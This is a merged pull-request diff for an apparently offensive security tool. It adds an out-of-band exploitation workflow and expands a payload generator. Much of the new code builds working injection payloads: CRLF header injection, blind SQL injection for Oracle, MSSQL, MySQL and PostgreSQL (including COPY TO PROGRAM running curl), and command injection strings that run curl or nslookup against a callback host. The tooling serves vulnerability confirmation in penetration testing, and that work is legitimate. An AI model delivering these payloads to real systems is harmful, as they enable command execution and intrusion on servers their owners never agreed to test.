Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 7 additions & 5 deletions cyberai/agents/exploit/agent.py
Original file line number Diff line number Diff line change
Expand Up @@ -248,23 +248,25 @@ def run_oob(self, target: str) -> dict:
self._log("phantom-grid not available — skipping OOB tests")
return {"oob_available": False, "interactions": []}

iid = grid.new_interaction_id()
# v2.0 token-flow: mint a real server-side capture token.
token = grid.create_token(label=f"cyberai-{target}") or grid.new_interaction_id()
grid_host = grid.base_url.replace("http://", "").replace("https://", "")

console.print("[bold red][ExploitAgent] Generating OOB payloads...[/bold red]")
payloads = get_all_payloads(grid_host, iid)
payloads = get_all_payloads(grid_host, token)
self._log("OOB payloads generated", {k: len(v) for k, v in payloads.items()})

console.print("[bold red][ExploitAgent] Polling phantom-grid...[/bold red]")
interactions = grid.get_interactions(iid)
interactions = grid.get_interactions(token)
hits = [
{"protocol": i.protocol, "source_ip": i.source_ip, "timestamp": i.timestamp}
for i in interactions
]
self._log(f"OOB callbacks: {len(hits)}", {"interaction_id": iid})
self._log(f"OOB callbacks: {len(hits)}", {"token": token})
return {
"oob_available": True,
"interaction_id": iid,
"token": token,
"capture_url": grid.capture_url(token),
"payloads_generated": {k: len(v) for k, v in payloads.items()},
"payloads": payloads,
"interactions": hits,
Expand Down
171 changes: 171 additions & 0 deletions cyberai/agents/exploit/oob_workflow.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,171 @@
"""OOB exploitation workflow — pick payload, deliver, correlate callback (day 22).

Ties phantom-grid v2.0 to CVE-driven exploitation: for a target vuln class,
mint a capture token, hand the caller a payload + capture URL to deliver, then
poll phantom-grid and correlate any callback back to the token. An optional LLM
turns a confirmed callback into a short analysis.

Delivery is the caller's responsibility (deliver_fn), mirroring SSRFWorkflow /
XXEWorkflow — the workflow never blindly injects into a live target.
"""

from __future__ import annotations

import json
import logging
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, List, Optional

from cyberai.integrations.oob_payloads import get_all_payloads
from cyberai.integrations.phantom_grid import OOBInteraction, PhantomGridClient
from cyberai.integrations.phantom_grid_poller import PhantomGridPoller

logger = logging.getLogger("cyberai.exploit.oob")

# Map a coarse vuln class to the payload category produced by oob_payloads.
VULN_TO_CATEGORY = {
"ssrf": "ssrf",
"xxe": "xxe",
"rce": "cmdi",
"command_injection": "cmdi",
"cmdi": "cmdi",
"sqli": "sqli",
"sql_injection": "sqli",
"crlf": "crlf",
"ssti": "ssti",
}


@dataclass
class OOBFinding:
"""Outcome of one OOB confirmation attempt."""

vuln_type: str
token: str
category: str
confirmed: bool
interaction: Optional[OOBInteraction] = None
payloads_tried: List[Dict[str, str]] = field(default_factory=list)
ai_analysis: str = ""
error: str = ""

@property
def severity(self) -> str:
return "HIGH" if self.confirmed else "INFO"

def to_dict(self) -> Dict[str, Any]:
return {
"vuln_type": self.vuln_type,
"token": self.token,
"category": self.category,
"confirmed": self.confirmed,
"source_ip": self.interaction.source_ip if self.interaction else "",
"protocol": self.interaction.protocol if self.interaction else "",
"payloads_tried": len(self.payloads_tried),
"ai_analysis": self.ai_analysis,
"error": self.error,
}


class OOBWorkflow:
"""Orchestrates payload -> deliver -> correlate for one vuln class."""

def __init__(
self,
grid: Optional[PhantomGridClient] = None,
llm: Any = None,
poller: Optional[PhantomGridPoller] = None,
):
self.grid = grid or PhantomGridClient()
self.llm = llm
# Poller owns wait_for_callback; default one shares the grid's base_url.
self.poller = poller or PhantomGridPoller(base_url=self.grid.base_url)

def _grid_host(self) -> str:
return self.grid.base_url.replace("http://", "").replace("https://", "")

def run(
self,
vuln_type: str,
deliver_fn: Callable[[Dict[str, str]], None],
label: str = "cyberai-oob",
) -> OOBFinding:
"""Mint a token, deliver each payload of the matching category, correlate.

deliver_fn receives one payload dict and is responsible for sending it
to the target (HTTP param, body, header, etc.). Returns on first
confirmed callback or after all payloads are exhausted.
"""
category = VULN_TO_CATEGORY.get(vuln_type.lower(), "ssrf")
if not self.grid.available:
return OOBFinding(
vuln_type=vuln_type,
token="",
category=category,
confirmed=False,
error="phantom-grid unavailable",
)

token = self.grid.create_token(label=label) or self.grid.new_interaction_id()
payloads = get_all_payloads(self._grid_host(), token).get(category, [])

tried: List[Dict[str, str]] = []
for p in payloads:
tried.append(p)
try:
deliver_fn(p)
except Exception as exc: # noqa: BLE001 — delivery is caller code
logger.warning("OOB delivery failed: %s", exc)
continue
interaction = self.poller.wait_for_callback(token)
if interaction is not None:
finding = OOBFinding(
vuln_type=vuln_type,
token=token,
category=category,
confirmed=True,
interaction=interaction,
payloads_tried=tried,
)
finding.ai_analysis = self._analyze(finding)
return finding

return OOBFinding(
vuln_type=vuln_type,
token=token,
category=category,
confirmed=False,
payloads_tried=tried,
)

def correlate(self, token: str, interactions: List[OOBInteraction]) -> Optional[OOBInteraction]:
"""Return the first interaction whose id matches the token."""
for i in interactions:
if i.interaction_id == token or token in (i.payload or ""):
return i
return interactions[0] if interactions else None

def _analyze(self, finding: OOBFinding) -> str:
"""Optional LLM summary of a confirmed OOB callback."""
if self.llm is None or finding.interaction is None:
return ""
system = (
"You are an offensive security analyst. A blind vulnerability was "
"confirmed via an out-of-band callback. In 2-3 sentences, state the "
"vulnerability class, why the callback confirms it, and the impact."
)
ctx = {
"vuln_type": finding.vuln_type,
"category": finding.category,
"protocol": finding.interaction.protocol,
"source_ip": finding.interaction.source_ip,
}
try:
return self.llm.call(
messages=[{"role": "user", "content": json.dumps(ctx)}],
system=system,
agent_name="exploit-oob",
)
except Exception as exc: # noqa: BLE001 — analysis is best-effort
logger.warning("OOB LLM analysis failed: %s", exc)
return ""
2 changes: 1 addition & 1 deletion cyberai/core/config.py
Original file line number Diff line number Diff line change
Expand Up @@ -21,7 +21,7 @@ class LLMConfig:
@dataclass
class PhantomConfig:
intel_db: Path = Path("~/.phantom/intel.db")
grid_url: str = "http://127.0.0.1:8080"
grid_url: str = "http://127.0.0.1:9090"
grid_api_key: Optional[str] = field(default_factory=lambda: os.getenv("PHANTOM_GRID_KEY"))


Expand Down
106 changes: 101 additions & 5 deletions cyberai/integrations/oob_payloads.py
Original file line number Diff line number Diff line change
@@ -1,14 +1,17 @@
"""
OOB payload generator — SSRF / XXE / SSTI / RCE templates.
Each payload embeds a unique interaction_id for phantom-grid tracking.
OOB payload generator — SSRF / XXE / SSTI / RCE / CRLF / SQLi / CMDi templates.

Each payload embeds a unique interaction_id (phantom-grid token) for tracking.
HTTP callbacks target the v2.0 capture endpoint: http://<host>/c/<token>.
DNS callbacks use <token>.<host>.
"""

from typing import Dict, List


def generate_ssrf_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]:
"""HTTP/DNS SSRF payloads pointing to phantom-grid."""
base = f"{grid_host}/{interaction_id}"
base = f"{grid_host}/c/{interaction_id}"
dns = f"{interaction_id}.{grid_host}"
return [
{
Expand Down Expand Up @@ -36,7 +39,7 @@ def generate_ssrf_payloads(grid_host: str, interaction_id: str) -> List[Dict[str

def generate_xxe_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]:
"""Blind XXE payloads with OOB DNS/HTTP exfil."""
url = f"http://{grid_host}/{interaction_id}"
url = f"http://{grid_host}/c/{interaction_id}"
return [
{
"type": "xxe_oob_http",
Expand Down Expand Up @@ -107,7 +110,7 @@ def generate_ssti_payloads() -> List[Dict[str, str]]:

def generate_rce_oob_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]:
"""OOB RCE confirmation payloads via DNS/HTTP callback."""
url = f"http://{grid_host}/{interaction_id}"
url = f"http://{grid_host}/c/{interaction_id}"
return [
{
"type": "rce_curl",
Expand All @@ -132,11 +135,104 @@ def generate_rce_oob_payloads(grid_host: str, interaction_id: str) -> List[Dict[
]


def generate_crlf_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]:
"""CRLF / HTTP header injection with OOB callback confirmation."""
cb = f"http://{grid_host}/c/{interaction_id}"
return [
{
"type": "crlf_header_inject",
"payload": f"%0d%0aLocation:%20{cb}",
"description": "CRLF — inject Location header redirect to phantom-grid",
},
{
"type": "crlf_response_split",
"payload": (
f"%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/c/{interaction_id}%20HTTP/1.1"
),
"description": "CRLF — response splitting with embedded callback path",
},
{
"type": "crlf_set_cookie",
"payload": f"%0d%0aSet-Cookie:%20oob={interaction_id}",
"description": "CRLF — Set-Cookie injection marker",
},
]


def generate_sqli_oob_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]:
"""Blind SQLi OOB exfiltration — Oracle / MSSQL / MySQL / PostgreSQL."""
http = f"http://{grid_host}/c/{interaction_id}"
dns = f"{interaction_id}.{grid_host}"
return [
{
"type": "sqli_oracle_utl_http",
"payload": f"' || UTL_HTTP.REQUEST('{http}') || '",
"description": "Oracle OOB via UTL_HTTP.REQUEST",
},
{
"type": "sqli_oracle_dns",
"payload": (f"' || (SELECT DBMS_LDAP.INIT('{dns}',80) FROM DUAL) || '"),
"description": "Oracle OOB DNS via DBMS_LDAP.INIT",
},
{
"type": "sqli_mssql_xp_dirtree",
"payload": f"'; EXEC master..xp_dirtree '\\\\{dns}\\x'; --",
"description": "MSSQL OOB via xp_dirtree UNC path (SMB/DNS)",
},
{
"type": "sqli_mysql_load_file",
"payload": f"' UNION SELECT LOAD_FILE(CONCAT('\\\\{dns}\\a')) -- -",
"description": "MySQL OOB via LOAD_FILE UNC (Windows)",
},
{
"type": "sqli_pg_copy_program",
"payload": f"'; COPY (SELECT '') TO PROGRAM 'curl {http}'; --",
"description": "PostgreSQL OOB via COPY TO PROGRAM",
},
]


def generate_cmdi_payloads(grid_host: str, interaction_id: str) -> List[Dict[str, str]]:
"""Command injection OOB — separators with HTTP/DNS callback."""
http = f"http://{grid_host}/c/{interaction_id}"
dns = f"{interaction_id}.{grid_host}"
return [
{
"type": "cmdi_backtick",
"payload": f"`curl {http}`",
"description": "CMDi via backtick substitution",
},
{
"type": "cmdi_dollar_paren",
"payload": f"$(curl {http})",
"description": "CMDi via $() substitution",
},
{
"type": "cmdi_pipe",
"payload": f"| curl {http}",
"description": "CMDi via pipe",
},
{
"type": "cmdi_semicolon",
"payload": f"; curl {http}",
"description": "CMDi via semicolon separator",
},
{
"type": "cmdi_dns_newline",
"payload": f"%0anslookup {dns}",
"description": "CMDi via newline + DNS lookup",
},
]


def get_all_payloads(grid_host: str, interaction_id: str) -> Dict[str, List[Dict[str, str]]]:
"""Return all payload categories keyed by type."""
return {
"ssrf": generate_ssrf_payloads(grid_host, interaction_id),
"xxe": generate_xxe_payloads(grid_host, interaction_id),
"ssti": generate_ssti_payloads(),
"rce": generate_rce_oob_payloads(grid_host, interaction_id),
"crlf": generate_crlf_payloads(grid_host, interaction_id),
"sqli": generate_sqli_oob_payloads(grid_host, interaction_id),
"cmdi": generate_cmdi_payloads(grid_host, interaction_id),
}
Loading
Loading